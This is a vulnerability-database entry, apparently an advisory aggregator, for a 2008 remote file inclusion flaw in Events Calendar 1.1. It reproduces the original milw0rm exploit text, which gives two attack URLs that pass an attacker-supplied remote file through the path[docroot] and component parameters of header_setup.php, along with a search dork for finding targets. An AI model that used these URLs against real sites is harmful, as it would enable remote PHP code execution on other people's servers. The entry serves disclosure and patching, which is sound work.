Events Calendar 1.1 Remote File Inclusion Vulnerability

vendor:

Events Calendar

by:

kevin mitnick

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Events Calendar

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: YES

Related CWE: N/A

CPE: a:webscripts:events_calendar

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Events Calendar 1.1 Remote File Inclusion Vulnerability

A remote file inclusion vulnerability exists in Events Calendar 1.1, which allows an attacker to include a remote file containing malicious code. This can be exploited to execute arbitrary PHP code by sending a specially crafted request to the vulnerable script.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version.

Source

Exploit-DB raw data:

#########################################################
#
# Events Calendar 1.1

Remote File Inclusion Vulnerability


#========================================================
# Author: kevin mitnick( tunisianblackhat team ) =
# =
# Home : http://tunisianblackhat.com =
# =
# email: kevinmitnick[A]live.fr =
# =
#=========================================================
#
# script : Events Calendar 1.1#
http://webscripts.softpedia.com/script/Calendar-Systems/Events-Calendar-WebBiscuits-46424.html
# DorK : Events Calendar 1.1#
##########################################################

[~] Exploit :


http://youwebsite/panel/common/theme/default/header_setup.php?path[docroot]=[EV!L]
http://youwebsite/panel/common/theme/default/header_setup.php?component=[EV!L]

########################( Greetz )###########################
# marwé§_neo , mrabah12R ,KaMiKaZe ,NaRuTo ,hijacker #
# Boomrang_Victim and all tunisian hackers #
# #
# #
# #
###########################################################

# milw0rm.com [2008-09-29]